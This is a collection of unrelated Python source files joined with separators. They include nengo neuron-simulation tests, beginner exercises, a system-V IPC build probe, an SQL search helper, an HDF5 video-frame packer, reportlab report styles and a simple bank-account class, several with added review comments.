    with nengo.Network(seed=seed) as net:
        a = nengo.Node([0.5])
        n = 100
        ens = nengo.Ensemble(n, 1, neuron_type=neuron_type(amplitude=amplitude))
        ens2 = nengo.Ensemble(
            n,
            1,
            gain=np.ones(n),
            bias=np.zeros(n),
            neuron_type=nengo.SpikingRectifiedLinear(),
        )
        nengo.Connection(a, ens)
        # note: slight boost on transform so that the post neurons are pushed
        # over threshold, rather than ==threshold
        nengo.Connection(
            ens.neurons, ens2.neurons, synapse=None, transform=np.eye(n) * 1.02
        )
        node = nengo.Node(size_in=n)
        nengo.Connection(ens.neurons, node, synapse=None)
        ens_p = nengo.Probe(ens, synapse=0.1)
        neuron_p = nengo.Probe(ens.neurons)
        indirect_p = nengo.Probe(node)
        neuron2_p = nengo.Probe(ens2.neurons)
    with Simulator(net, precompute=True) as sim:
        sim.run(1)
    spikemean1 = np.mean(sim.data[neuron_p], axis=0)
    spikemean2 = np.mean(sim.data[neuron2_p], axis=0)
    plt.subplot(211)
    plt.plot(sim.trange(), sim.data[ens_p])
    plt.subplot(212)
    i = np.argsort(spikemean1)
    plt.plot(spikemean1[i])
    plt.plot(spikemean2[i], linestyle="--")
    assert allclose(sim.data[ens_p][sim.trange() > 0.9], 0.5, atol=0.05)
    assert np.max(sim.data[neuron_p]) == amplitude / sim.dt
    # the identity neuron-to-neuron connection causes `ens2` to fire at
    # `amplitude` * the firing rate of `ens` (i.e., the same overall firing
    # rate as `ens`)
    assert allclose(spikemean1, spikemean2, atol=1)
    # note: one-timestep delay, despite synapse=None
    assert allclose(sim.data[neuron_p][:-1], sim.data[indirect_p][1:])
def test_bad_gain_error(Simulator):
    """Building an ensemble whose intercepts yield negative gains must raise
    a BuildError mentioning the negative gain."""
    with nengo.Network() as net:
        # intercepts of 2.0 are outside the raised intercept limit below
        nengo.Ensemble(5, 1, intercepts=nengo.dists.Choice([2.0]))
    model = Model()
    model.intercept_limit = 10.0
    with pytest.raises(BuildError, match="negative.*gain"):
        with Simulator(net, model=model):
            pass
def test_neuron_build_errors(Simulator):
    """Unsupported neuron types/configurations must raise BuildError (or warn
    for non-zero initial voltage) with informative messages."""
    # unsupported neuron type
    with nengo.Network() as net:
        nengo.Ensemble(5, 1, neuron_type=nengo.neurons.Sigmoid(tau_ref=0.005))
    with pytest.raises(BuildError, match="type 'Sigmoid' cannot be simulated"):
        with Simulator(net):
            pass
    # unsupported RegularSpiking type
    with nengo.Network() as net:
        nengo.Ensemble(
            5, 1, neuron_type=nengo.RegularSpiking(nengo.Sigmoid(tau_ref=0.005))
        )
    with pytest.raises(BuildError, match="RegularSpiking.*'Sigmoid'.*cannot be simu"):
        with Simulator(net):
            pass
    # amplitude with RegularSpiking base type
    with nengo.Network() as net:
        nengo.Ensemble(
            5, 1, neuron_type=nengo.RegularSpiking(nengo.LIFRate(amplitude=0.5))
        )
    with pytest.raises(BuildError, match="Amplitude is not supported on RegularSpikin"):
        with Simulator(net):
            pass
    # non-zero initial voltage warning
    with nengo.Network() as net:
        nengo.Ensemble(
            5,
            1,
            neuron_type=nengo.LIF(initial_state={"voltage": nengo.dists.Uniform(0, 1)}),
        )
    with pytest.warns(Warning, match="initial values for 'voltage' being non-zero"):
        with Simulator(net):
            pass
@pytest.mark.parametrize("radius", [0.01, 1, 100])
def test_radius_probe(Simulator, seed, radius):
    """Probed decoded output must settle near radius/2 for radii spanning
    four orders of magnitude (10% relative tolerance)."""
    with nengo.Network(seed=seed) as model:
        stim = nengo.Node(radius / 2.0)
        ens = nengo.Ensemble(
            n_neurons=100,
            dimensions=1,
            radius=radius,
            intercepts=nengo.dists.Uniform(-0.95, 0.95),
        )
        nengo.Connection(stim, ens)
        p = nengo.Probe(ens, synapse=0.1)
    with Simulator(model, precompute=True) as sim:
        sim.run(0.5)
    assert np.allclose(sim.data[p][-1:], radius / 2.0, rtol=0.1)
@pytest.mark.parametrize("radius1", [0.01, 100])
@pytest.mark.parametrize("radius2", [0.01, 100])
@pytest.mark.parametrize("weights", [True, False])
def test_radius_ens_ens(Simulator, seed, radius1, radius2, weights):
    """A scaled ens->ens connection must carry radius1/2 into radius2/2
    across extreme radius combinations, with and without weight solvers."""
    with nengo.Network(seed=seed) as model:
        stim = nengo.Node(radius1 / 2.0)
        a = nengo.Ensemble(
            n_neurons=100,
            dimensions=1,
            radius=radius1,
            intercepts=nengo.dists.Uniform(-0.95, 0.95),
        )
        b = nengo.Ensemble(
            n_neurons=100,
            dimensions=1,
            radius=radius2,
            intercepts=nengo.dists.Uniform(-0.95, 0.95),
        )
        nengo.Connection(stim, a)
        # rescale between the two radii so b represents the same fraction
        nengo.Connection(
            a,
            b,
            synapse=0.01,
            transform=radius2 / radius1,
            solver=nengo.solvers.LstsqL2(weights=weights),
        )
        p = nengo.Probe(b, synapse=0.1)
    with Simulator(model, precompute=True) as sim:
        sim.run(0.4)
    assert np.allclose(sim.data[p][-1:], radius2 / 2.0, rtol=0.2)
|
# Repeatedly read a month number and print its season (in Russian);
# out-of-range input prints an error prompt. Loops forever by design.
while True:
    m = int(input('Введите месяц числом от 1 до 12'))
    # Bug fix: the original guard `m >= 0 or m < 12` was always true for any
    # integer (wrong operator, wrong bound), so it is dropped entirely --
    # every input, valid or not, must reach the error message branch below.
    if m in (1, 2, 12):
        print('Зима')
    elif m in (3, 4, 5):
        print('Весна')
    elif m in (6, 7, 8):
        print('Лето')
    elif m in (9, 10, 11):
        print('Осень')
    else:
        print('Прошу вас от 1 до 12')
|
class Tracer:
    """Decorator whose tracing output can be toggled at runtime via IsEnabled."""

    def __init__(self):
        self.IsEnabled = True  # when False, decorated calls run silently

    def __call__(self, f):
        from functools import wraps  # local import keeps the block self-contained

        @wraps(f)  # fix: preserve f's __name__/__doc__ (the original hid them)
        def wrap(*args, **kwargs):
            if self.IsEnabled:
                print('Tracing is happening')
            return f(*args, **kwargs)
        return wrap
tracer = Tracer()  # module-level tracer; toggled below

@tracer
def rotate_list(lst):
    # Return lst rotated left by one position (builds a new list).
    return lst[1:] +[lst[0]]

lst = [1,2,3]
print(rotate_list(lst))  # traced: prints the trace line, then [2, 3, 1]
tracer.IsEnabled = False
print(rotate_list(lst))  # tracing disabled: prints only [2, 3, 1]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Take absolute value. Needed before smooth if amplitudes are negative!
# Implemented by Martin Hardcastle based on clip/flag code
import logging
from operations_lib import *
logging.debug('Loading ABS module.')
def run( step, parset, H ):
    """Take the absolute value of the selected solution tables' values.

    Needed before smoothing when amplitudes are negative. Selection (antenna,
    polarisation, direction) comes from the parset; values are iterated over
    the time axis, rewritten as their absolute value, and the fraction that
    was negative is logged. Returns 0 on completion.
    """
    import numpy as np
    from h5parm import solFetcher, solWriter

    soltabs = getParSoltabs( step, parset, H )
    ants = getParAxis( step, parset, H, 'ant' )
    pols = getParAxis( step, parset, H, 'pol' )
    dirs = getParAxis( step, parset, H, 'dir' )

    # No need to specify an axis, just use time
    axesToAbs = ['time']

    for soltab in openSoltabs( H, soltabs ):
        sf = solFetcher(soltab)
        sw = solWriter(soltab)
        logging.info("Taking ABSolute value of soltab: "+soltab._v_name)
        sf.setSelection(ant=ants, pol=pols, dir=dirs)
        total = 0
        count = 0
        for vals, coord in sf.getValuesIter(returnAxes=axesToAbs):
            total += len(vals)
            count += np.count_nonzero(vals < 0)
            valsnew = np.abs(vals)
            # writing back the solutions
            coord = removeKeys(coord, axesToAbs)
            sw.setSelection(**coord)
            sw.setValues(valsnew)
        # Bug fixes: report a true percentage (the original printed the 0-1
        # fraction next to '%%') and avoid ZeroDivisionError on an empty
        # selection.
        pct = 100. * count / total if total else 0.
        logging.info('Abs: %i points initially negative (%f %%)' % (count, pct))
        sw.addHistory('ABSolute value taken')
    return 0
|
def multiply(x, y):
    """Return the product of x and y."""
    return x * y
def subtract(x, y):
    """Return x minus y."""
    return x - y
def divide(x, y):
    """Return x divided by y (true division; raises ZeroDivisionError if y == 0)."""
    return x / y
def square(x):
    """Return x squared."""
    return x * x
def raise_to(x, y):
    """Return x raised to the power y, announcing itself on stdout first."""
    print("This function raises x to the power y")
    return x ** y
def add(x, y):
    """Return the sum of x and y."""
    return x + y
|
from engine import get_psql_engine
from jinja2 import Environment
from sql_templates import SIMPLE_SEARCH_TEMPLATE, SEARCH_TEMPLATE, SIMPLE_MATCH_TEMPLATE, MATCH_TEMPLATE
from config import PPM_DIFF,RT_DIFF,WITH_MS2,EXCLUDE_CONTROLS,INT_OVER_CONTROLS,ATTRS
def construct_search(mz, rt, ion_mode, config):
    """Render the search SQL for this config and build its parameter tuple.

    Returns (query, params). The simple template is used unless control
    samples are excluded; the full template additionally filters on
    attributes and, when set, the intensity-over-controls threshold.
    """
    ppm_diff = config.get(PPM_DIFF)
    rt_diff = config.get(RT_DIFF)
    ioc = config.get(INT_OVER_CONTROLS)
    base_params = (ion_mode, mz, ppm_diff, rt, rt_diff)
    env = Environment()
    if not config.get(EXCLUDE_CONTROLS):
        query = env.from_string(SIMPLE_SEARCH_TEMPLATE).render(
            {'with_ms2': config.get(WITH_MS2)})
        params = base_params
    else:
        query = env.from_string(SEARCH_TEMPLATE).render({
            'attrs': config.get(ATTRS),
            'ioc': ioc,
            'with_ms2': config.get(WITH_MS2),
        })
        # the ioc threshold is one extra trailing placeholder when present
        params = base_params + (ioc,) if ioc is not None else base_params
    return query, params
def construct_match(exp_name, ion_mode, config):
    """Render the experiment-matching SQL and build its parameter tuple.

    Returns (query, params). Mirrors construct_search, but keyed on the
    experiment name; note the ioc threshold slots into the middle of the
    parameter tuple here, not the end.
    """
    ppm_diff = config.get(PPM_DIFF)
    rt_diff = config.get(RT_DIFF)
    ioc = config.get(INT_OVER_CONTROLS)
    env = Environment()
    if not config.get(EXCLUDE_CONTROLS):
        query = env.from_string(SIMPLE_MATCH_TEMPLATE).render(
            {'with_ms2': config.get(WITH_MS2)})
        params = (ion_mode, exp_name, ion_mode, ppm_diff, rt_diff)
    else:
        query = env.from_string(MATCH_TEMPLATE).render({
            'attrs': config.get(ATTRS),
            'ioc': ioc,
            'with_ms2': config.get(WITH_MS2),
        })
        if ioc is not None:
            params = (ion_mode, exp_name, ioc, ion_mode, ppm_diff, rt_diff)
        else:
            params = (ion_mode, exp_name, ion_mode, ppm_diff, rt_diff)
    return query, params
def search(engine,mz,rt,ion_mode,config):
    """returns ResultProxy"""
    # NOTE(review): the connection is never closed here; the ResultProxy
    # needs it open while rows are fetched, but callers should release it
    # once they are done.
    c = engine.connect()
    query, params = construct_search(mz,rt,ion_mode,config)
    return c.execute(query,*params)
def match(engine,exp_name,ion_mode,config):
    """Run the experiment-matching query for exp_name; returns a ResultProxy.

    Same connection-lifetime caveat as search(): the connection stays open
    for the returned ResultProxy.
    """
    c = engine.connect()
    query, params = construct_match(exp_name,ion_mode,config)
    return c.execute(query,*params)
def results_as_csv(r):
    """Yield CSV lines for a result set, exploding the 'attrs' key=value list
    into extra columns (keys named 'ignore' are dropped).

    The first yielded line is the header; with no rows only the base header
    (minus 'attrs') is produced.
    """
    rows = r.fetchall()
    cols = [c for c in r.keys() if c != 'attrs']
    if not rows:
        yield ','.join(cols)
        return
    # Collect the extra column headings contributed by attrs, in first-seen order.
    attr_cols = []
    for row in rows:
        for pair in dict(row.items()).get('attrs'):
            key, _ = pair.split('=')
            if key != 'ignore' and key not in attr_cols:
                attr_cols.append(key)
    cols += attr_cols
    yield ','.join(cols)
    # Emit one line per row with attrs merged in as ordinary columns.
    for row in rows:
        record = dict(row.items())
        exploded = dict(pair.split('=') for pair in record.pop('attrs'))
        record.update(exploded)  # FIXME avoid name collisions
        yield ','.join(str(record.get(c, '')) for c in cols)
def test(engine):
    # NOTE(review): this smoke test is stale -- `search` takes
    # (engine, mz, rt, ion_mode, config) but is called below with ioc=/attrs=
    # keyword arguments it does not accept, and `print case` / `print line`
    # are Python 2 statements. It will fail under the current module API and
    # under Python 3.
    cases = [
        dict(mz=100,rt=90),
        dict(mz=102,rt=90),
        dict(mz=102,rt=200),
        dict(mz=103,rt=100),
        dict(mz=105,rt=80,ioc=10),
        dict(mz=107,rt=200,attrs=['media']),
        dict(mz=108,rt=100,attrs=['media']),
        dict(mz=109,rt=500,attrs=['media','time']),
        dict(mz=111,rt=500,attrs=['media','time']),
        dict(mz=113,rt=100,attrs=['media'],ioc=10),
        dict(mz=113,rt=200,attrs=['media'],ioc=10),
        dict(mz=114,rt=100,attrs=['media'],ioc=10),
        dict(mz=116,rt=100,attrs=['media','time'],ioc=10)
    ]
    for case in cases:
        print case
        r = search(engine,
                   case.get('mz'),
                   case.get('rt'),
                   ioc=case.get('ioc'),
                   attrs=case.get('attrs',[]))
        for line in results_as_csv(r):
            print line
if __name__=='__main__':
    # Run the smoke test against the configured PostgreSQL engine.
    engine = get_psql_engine()
    test(engine)
|
# read three numbers
number1 = int(input("Enter the first number: "))
number2 = int(input("Enter the second number: "))
number3 = int(input("Enter the third number: "))

# Start by assuming the first number is the largest, then let each of the
# remaining numbers challenge and, if larger, replace that assumption.
largest_number = number1
for candidate in (number2, number3):
    if candidate > largest_number:
        largest_number = candidate

# print the result
print("The largest number is:", largest_number)
import FWCore.ParameterSet.Config as cms
# Silicon Strip Digitizer running with APV Mode Deconvolution
from SimGeneral.MixingModule.stripDigitizer_cfi import *
# APVpeakmode = False presumably selects deconvolution (non-peak) APV readout
# mode, per the comment above -- confirm against stripDigitizer_cfi.
stripDigitizer.APVpeakmode = False
|
# 1. combo_string
def combo_string(a, b):
    """Return short + long + short, where short is the shorter of a and b.

    On a length tie, a is treated as the shorter string.
    """
    shorter, longer = (a, b) if len(a) <= len(b) else (b, a)
    return shorter + longer + shorter
# 2. extra_end
def extra_end(str):
    """Return the last two characters of str, repeated three times."""
    return str[-2:] * 3
# 3. first_half
def first_half(str):
    """Return the first half of str (odd lengths round down)."""
    half = len(str) // 2
    return str[:half]
# 4. first_two
def first_two(str):
    """Return the first two characters of str.

    Slicing already returns the whole string when it is shorter than two
    characters, so no explicit length check is needed.
    """
    return str[:2]
# 5. hello_name
def hello_name(name):
    """Return the greeting "Hello <name>!"."""
    return f"Hello {name}!"
# 6. left2
def left2(str):
    """Return str rotated left by two characters.

    For strings of length <= 2 the rotation is the identity, which the
    slice expression already handles without a length check.
    """
    return str[2:] + str[:2]
# 7. make_abba
def make_abba(a, b):
    """Return the string a, b, b, a concatenated in that order."""
    return a + b * 2 + a
# 8. make_out_word
def make_out_word(out, word):
    """Insert word into the middle of the 4-character string out."""
    left, right = out[:2], out[2:]
    return left + word + right
# 9. make_tags
def make_tags(tag, word):
    """Wrap word in an HTML-style open/close tag pair."""
    open_tag = "<" + tag + ">"
    close_tag = "</" + tag + ">"
    return open_tag + word + close_tag
# 10. non-start
def non_start(a, b):
    """Concatenate a and b with the first character of each removed."""
    a_rest = a[1:]
    b_rest = b[1:]
    return a_rest + b_rest
# 11. without_end
def without_end(str):
    """Return str with its first and last characters removed."""
    return str[1:-1]
|
# For 0..100 print the number followed by 'zip' when even and 'zap' when a
# multiple of 5 (both tags for numbers divisible by 10).
for i in range(101):
    tags = []
    if i % 2 == 0:
        tags.append('zip')
    if i % 5 == 0:
        tags.append('zap')
    print(i, *tags)
#please note that there are many solutions to this problem
# Here is what the output should look like:
# 0 zip zap
# 1
# 2 zip
# 3
# 4 zip
# 5 zap
# 6 zip
# 7
# 8 zip
# 9
# 10 zip zap
# 11
# 12 zip
# 13
# 14 zip
# 15 zap
# 16 zip
# 17
# 18 zip
# 19
# 20 zip zap
# 21
# 22 zip
# 23
# 24 zip
# 25 zap
# 26 zip
# 27
# 28 zip
# 29
# 30 zip zap
# 31
# 32 zip
# 33
# 34 zip
# 35 zap
# 36 zip
# 37
# 38 zip
# 39
# 40 zip zap
# 41
# 42 zip
# 43
# 44 zip
# 45 zap
# 46 zip
# 47
# 48 zip
# 49
# 50 zip zap
# 51
# 52 zip
# 53
# 54 zip
# 55 zap
# 56 zip
# 57
# 58 zip
# 59
# 60 zip zap
# 61
# 62 zip
# 63
# 64 zip
# 65 zap
# 66 zip
# 67
# 68 zip
# 69
# 70 zip zap
# 71
# 72 zip
# 73
# 74 zip
# 75 zap
# 76 zip
# 77
# 78 zip
# 79
# 80 zip zap
# 81
# 82 zip
# 83
# 84 zip
# 85 zap
# 86 zip
# 87
# 88 zip
# 89
# 90 zip zap
# 91
# 92 zip
# 93
# 94 zip
# 95 zap
# 96 zip
# 97
# 98 zip
# 99
# 100 zip zap |
from django.apps import AppConfig
class ShopifywebhooksConfig(AppConfig):
    """Django application configuration for the shopifywebhooks app."""
    name = 'shopifywebhooks'
|
import os.path
import os
import subprocess
import distutils.sysconfig
# Set these to None for debugging or subprocess.PIPE to silence compiler
# warnings and errors.
STDOUT = subprocess.PIPE
STDERR = subprocess.PIPE
# STDOUT = None
# STDERR = None
# This is the max length that I want a printed line to be.
MAX_LINE_LENGTH = 78
# NOTE(review): distutils is deprecated (removed in Python 3.12); the stdlib
# sysconfig.get_config_h_filename() is the drop-in replacement here.
PYTHON_INCLUDE_DIR = os.path.dirname(distutils.sysconfig.get_config_h_filename())
# print(PYTHON_INCLUDE_DIR)
def line_wrap_paragraph(s):
    """Split s into lines of fewer than MAX_LINE_LENGTH characters, breaking
    at spaces.

    Bug fix: when a single word was longer than a whole line, rfind()
    returned -1, `beginning` never advanced, and the original looped
    forever; such words are now hard-broken at the line boundary.
    """
    lines = []
    beginning = 0
    end = MAX_LINE_LENGTH - 1
    while True:
        if end >= len(s):
            lines.append(s[beginning:])
            return lines
        last_space = s[beginning:end].rfind(' ')
        if last_space == -1:
            # No break point in range: hard-break the oversized word.
            lines.append(s[beginning:end])
            beginning = end
        else:
            lines.append(s[beginning:beginning + last_space])
            beginning += last_space + 1
        end = beginning + MAX_LINE_LENGTH - 1
def print_bad_news(value_name, default):
    """Print a star-bordered warning that value_name could not be probed and
    will default to the given value, plus a plea to report the problem."""
    body = ("Setup can't determine %s on your system, so it will default to "
            "%s which may not be correct." % (value_name, default))
    plea = ("Please report this message and your operating system info to "
            "the package maintainer listed in the README file.")
    lines = line_wrap_paragraph(body) + [''] + line_wrap_paragraph(plea)
    border = '*' * MAX_LINE_LENGTH
    print(border + "\n* " + ('\n* '.join(lines)) + '\n' + border)
def does_build_succeed(filename):
    """Return True if ./prober/<filename> compiles and links cleanly."""
    cmd = "cc -Wall -I%s -o ./prober/foo ./prober/%s" % \
        (PYTHON_INCLUDE_DIR, filename)
    compiler = subprocess.Popen(cmd, shell=True, stdout=STDOUT, stderr=STDERR)
    # wait() yields the exit code; 0 means the compile & link succeeded.
    return compiler.wait() == 0
def compile_and_run(filename, linker_options=""):
    """Compile ./prober/<filename> and return its stdout (stripped, decoded);
    return None if the compile fails."""
    cmd = "cc -Wall -I%s -o ./prober/foo %s ./prober/%s" % \
        (PYTHON_INCLUDE_DIR, linker_options, filename)
    compiler = subprocess.Popen(cmd, shell=True, stdout=STDOUT, stderr=STDERR)
    if compiler.wait():
        return None  # non-zero exit code: compile failed
    output = subprocess.Popen(["./prober/foo"],
                              stdout=subprocess.PIPE).communicate()[0]
    return output.strip().decode()
def sniff_semtimedop():
    """Return True if the C library provides semtimedop()."""
    return does_build_succeed("semtimedop_test.c")
def sniff_union_semun_defined():
    """Return True if the system headers already define union semun."""
    # AFAICT the semun union is supposed to be declared in one's code.
    # However, a lot of legacy code gets this wrong and some header files
    # define it, e.g.sys/sem.h on OS X where it's #ifdef-ed so that legacy
    # code won't break. On some systems, it appears and disappears based
    # on the #define value of _XOPEN_SOURCE.
    return does_build_succeed("sniff_union_semun_defined.c")
def probe_semvmx():
    """Return SEMVMX, the maximum System V semaphore value.

    Hardcoded; this has proven correct on every system tested so far.
    https://github.com/osvenskan/sysv_ipc/issues/3
    """
    return 32767
def probe_page_size():
    """Return the system page size probed via a small C program, falling back
    to 4096 (with a printed warning) when the probe fails to build.

    NOTE(review): the probed value is a decoded string while the fallback is
    an int; downstream only interpolates it into generated C text, so both
    forms work, but the inconsistency is worth knowing about.
    """
    page_size = compile_and_run("probe_page_size.c")
    if page_size is None:
        page_size = 4096
        print_bad_news("the value of PAGE_SIZE", page_size)
    return page_size
def probe():
    """Probe the build environment and write probe_results.h (if absent).

    Returns the dict of #define name -> value that was (or would have been)
    written. An existing probe_results.h is deliberately left untouched so
    hand edits survive re-running setup.
    """
    d = {"KEY_MAX": "LONG_MAX",
         "KEY_MIN": "LONG_MIN"
         }
    # conditionals contains preprocessor #defines to be written to probe_results.h that might
    # already be defined on some platforms. Any symbol in this list will be surrounded with
    # preprocessor directives #ifndef/#endif in probe_results.h.
    # If a symbol is in this list but isn't written to probe_results.h, no harm done.
    conditionals = ["_SEM_SEMUN_UNDEFINED",
                    # PAGE_SIZE is already #defined elsewhere on FreeBSD.
                    "PAGE_SIZE",
                    ]
    with open("VERSION") as f:
        version = f.read().strip()
    d["SYSV_IPC_VERSION"] = f'"{version}"'
    d["PAGE_SIZE"] = probe_page_size()
    if sniff_semtimedop():
        d["SEMTIMEDOP_EXISTS"] = ""
    d["SEMAPHORE_VALUE_MAX"] = probe_semvmx()
    # Some (all?) Linux platforms #define _SEM_SEMUN_UNDEFINED if it's up
    # to my code to declare this union, so I use that flag as my standard.
    if not sniff_union_semun_defined():
        d["_SEM_SEMUN_UNDEFINED"] = ""
    msg = """/*
This header file was generated when you ran setup. Once created, the setup
process won't overwrite it, so you can adjust the values by hand and
recompile if you need to.
To enable lots of debug output, add this line and re-run setup.py:
#define SYSV_IPC_DEBUG
To recreate this file, just delete it and re-run setup.py.
KEY_MIN, KEY_MAX and SEMAPHORE_VALUE_MAX are stored internally in longs, so
you should never #define them to anything larger than LONG_MAX regardless of
what your operating system is capable of.
*/
"""
    filename = "probe_results.h"
    if not os.path.exists(filename):
        lines = []
        for key in d:
            if key in conditionals:
                lines.append("#ifndef %s" % key)
            lines.append("#define %s\t\t%s" % (key, d[key]))
            if key in conditionals:
                lines.append("#endif")
        # A trailing '\n' keeps compilers happy...
        with open(filename, "w") as f:
            f.write(msg + '\n'.join(lines) + '\n')
    return d
if __name__ == "__main__":
    # Run the probe standalone and show the resulting #define dictionary.
    s = probe()
    print(s)
|
import os
import h5py
import numpy as np
import json
import glob
import pysrt
from tqdm import tqdm
from PIL import Image
from utils import read_json_lines, load_json, save_json
import cv2 as cv
# Source directories for the HQ RGB frames and precomputed optical flow.
rgb_path = "/home/scw/Downloads/tvqa_new/frames_hq/"
of_path = "/home/scw/CLionProjects/optical_flow/cmake-build-release/optical_flow_hq/"
# NOTE(review): opening in "w" mode at import time truncates whole_data.h5
# as a side effect of merely importing this module.
hf = h5py.File("whole_data.h5", "w")
def make_h5():
    """Resize every RGB and optical-flow frame to 224x224 and store them as
    gzip-compressed float32 datasets under /video/<show>/{rgb_,of_}<clip>/NNN
    in the module-level HDF5 file.

    NOTE(review): `print show_root_directory` is Python 2 statement syntax,
    and os.listdir() order is arbitrary, so the sequential NNN numbering
    assumes listings come back in frame order -- confirm before relying on it.
    """
    group = hf.create_group("video")
    #j = 0
    for show_root_directory in os.listdir(rgb_path):
        print show_root_directory
        show_group = group.create_group(show_root_directory)
        for clip in tqdm(os.listdir(rgb_path + show_root_directory)):
            rgb_group = show_group.create_group("rgb_" + clip)
            of_group = show_group.create_group("of_" + clip)
            i = 0
            for rgb_image in os.listdir(rgb_path + show_root_directory + "/" + clip):
                image = Image.open(rgb_path + show_root_directory + "/" + clip + '/' + rgb_image)
                image = image.resize((224, 224))
                rgb_group.create_dataset('{:03d}'.format(i+1), data=np.array(image, dtype=np.float32), compression="gzip")
                i += 1
            i = 0
            for of_image in os.listdir(of_path + show_root_directory + "/" + clip):
                image = Image.open(of_path + show_root_directory + "/" + clip + '/' + of_image)
                image = image.resize((224, 224))
                of_group.create_dataset('{:03d}'.format(i+1), data=np.array(image, dtype=np.float32), compression="gzip")
                i += 1
if __name__ == '__main__':
    # Build the HDF5 archive (the file itself was already opened at import).
    make_h5()
|
# -*- coding: utf-8 -*-
"""
This is the module ``report_defines.py`` for report generation by
simulation in Typhoon HIL API in Python.
Reserved to some value and text definitions for the report used in
``Report_function.py`` module.
Test Name: Modulation performance test
Description: This test set evaluates the performance of modulation
algorithms for grid-tied inverters. The tests are performed in open-loop,
where the grid is replaced by a variable RL load.
@author: Grupo de Eletrônica de Potência e Controle (GEPOC);
Tiarles Guterres (1°/2019)
Modules tree:
report_run (Top-Level)
| -> report_function
| -> report_defines <- This file
| -> report_parameters
| -> simulation_functions
| -> Interface_module
"""
import copy

from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.enums import TA_JUSTIFY, TA_LEFT, TA_CENTER
from reportlab.lib.units import cm
from reportlab.lib import colors
from reportlab.lib.pagesizes import A4
import numpy as np

# Pass/fail verdict markup used by the report tables
MSG_NOT_COMPLY = '<font color="red">Failed</font>'
MSG_COMPLY = '<font color="green">OK</font>'

### SIZES
width, height = A4
margins = {'right': 2.54*cm, 'left': 2.54*cm, 'top': 2.54*cm,
           'bottom': 1.25*cm}
# effective width/height: drawable area inside the page margins
ef_width = np.floor(width - margins['left'] - margins['right'])
ef_height = np.floor(height - margins['top'] - margins['bottom'])

### COLORS
darkblue = colors.Color(23.0/255, 54.0/255, 93.0/255)
blue = colors.Color(54.0/255, 95.0/255, 145.0/255)
lightblue = colors.Color(79.0/255, 129.0/255, 189.0/255)
grey = colors.Color(128.0/255, 128.0/255, 128.0/255)

### TEXT STYLE: used for wrapping data on flowables
styles = getSampleStyleSheet()


def _derived_style(base_name, **attributes):
    """Return a deep copy of stylesheet entry `base_name` with `attributes` set.

    The copy is essential: getSampleStyleSheet() hands out shared
    ParagraphStyle objects, and the original module fetched styles["BodyText"]
    twice and mutated the SAME object under two names (normal_style and
    normal_style_l), silently overwriting normal_style's TA_JUSTIFY alignment
    with TA_LEFT.
    """
    style = copy.deepcopy(styles[base_name])
    for attribute, value in attributes.items():
        setattr(style, attribute, value)
    return style


# NOTE(review): fonts 'Verdana', 'Cambria', 'Cambria Bold' and
# 'Dejavusans Bold Italic' are not built into reportlab — they must be
# registered with pdfmetrics elsewhere before rendering; confirm.
# NOTE(review): several styles below set `leftLineIndent`, which is not a
# standard ParagraphStyle attribute — possibly a typo for leftIndent;
# preserved as in the original pending confirmation.
normal_style = _derived_style(
    "BodyText", alignment=TA_JUSTIFY, wordWrap=1, fontName='Verdana',
    fontSize=10, firstLineIndent=0, leftIndent=0, leading=10*1.5,
    spaceAfter=0)
normal_style_l = _derived_style(
    "BodyText", alignment=TA_LEFT, wordWrap=1, fontName='Verdana',
    fontSize=10, firstLineIndent=0, leftIndent=0, leading=10*1.5,
    spaceAfter=0)
title_style = _derived_style(
    "Title", alignment=TA_LEFT, wordWrap=1, fontName='Cambria',
    fontSize=26, firstLineIndent=0, leftLineIndent=0, leading=26,
    spaceAfter=0, spaceBefore=0)
title_1_style = _derived_style(
    "Heading1", alignment=TA_LEFT, wordWrap=1, fontName='Cambria Bold',
    fontSize=16, firstLineIndent=0, leftLineIndent=0,
    # NOTE(review): leading was 0*fontSize == 0 in the original (lines would
    # overlap) — preserved; confirm it is intentional.
    leading=0,
    spaceAfter=0, spaceBefore=0)
title_2_style = _derived_style(
    "Heading2", alignment=TA_LEFT, wordWrap=1, fontName='Cambria',
    fontSize=14, firstLineIndent=0, leftLineIndent=0, leading=14,
    spaceAfter=10, spaceBefore=0)
v10_style = _derived_style(
    "Heading6", alignment=TA_LEFT, wordWrap=1, fontName='Verdana',
    fontSize=10, firstLineIndent=0, leftLineIndent=0, leading=10*1.5)
c10_style = _derived_style(
    "Heading5", alignment=TA_LEFT, wordWrap=1, fontName='Verdana',
    fontSize=10, firstLineIndent=0, leftLineIndent=0, leading=10)
djv10bi_style = _derived_style(
    "Heading4", alignment=TA_LEFT, wordWrap=1,
    fontName='Dejavusans Bold Italic', fontSize=10, firstLineIndent=0,
    leftLineIndent=0, leading=10)
legend_style = _derived_style(
    "Heading3", alignment=TA_CENTER, wordWrap=1, fontName='Verdana',
    fontSize=9, firstLineIndent=0, leftLineIndent=0, leading=9)
table_style = _derived_style(
    "Normal", alignment=TA_CENTER, wordWrap=1, fontName='Verdana',
    fontSize=8, leading=0.4*cm)
|
class Conta():
    """A simple bank account: client name, number, balance, operation log."""

    def __init__(self, clientes, numero, saldo=0, operacoes=None):
        # `operacoes=None` fixes the original mutable default argument: a
        # single shared list would have collected EVERY account's operations.
        self.clientes = clientes
        self.numero = numero
        self.saldo = saldo
        self.operacoes = [] if operacoes is None else operacoes

    def resumo(self):
        """Print the account number and current balance."""
        print(f"CC Número {self.numero} \nSaldo: {self.saldo}")

    def saque(self, quantidade):
        """Withdraw `quantidade` if funds allow; return True on success."""
        if quantidade > self.saldo:
            return False
        self.saldo -= quantidade
        self.operacoes.append(['Saque', quantidade])
        return True

    def deposito(self, valor):
        """Deposit `valor` into the account and log the operation."""
        self.saldo += valor
        self.operacoes.append(['Deposito', valor])

    def extrato(self):
        """Print the full operation log followed by the balance."""
        print(f"\nExtrato CC N* {self.numero}")
        for o in self.operacoes:
            print(f"{o[0]} : {o[1]} ")
        print(f"\nSaldo: {self.saldo}")
class ContaEspecial(Conta):
    """Account variant carrying an overdraft limit (stored, not enforced)."""

    def __init__(self, clientes, numero, saldo=0, limite=0):
        super().__init__(clientes, numero, saldo)
        self.limite = limite
# Quick manual exercise of both account classes.
conta_1 = Conta('Arthur', 100, 1200)
conta_2 = ContaEspecial('Arthur', 100, 2200, 2400)

print("Conta 1: ")
print(conta_1.saque(1200))  # True
print(conta_1.saldo)  # 0
print(conta_1.deposito(2400))  # deposito returns None
conta_1.extrato()
print("\n")
print("Conta 2: ")
print(conta_2.saque(1200))  # True
print(conta_2.saldo)  # 1000
|
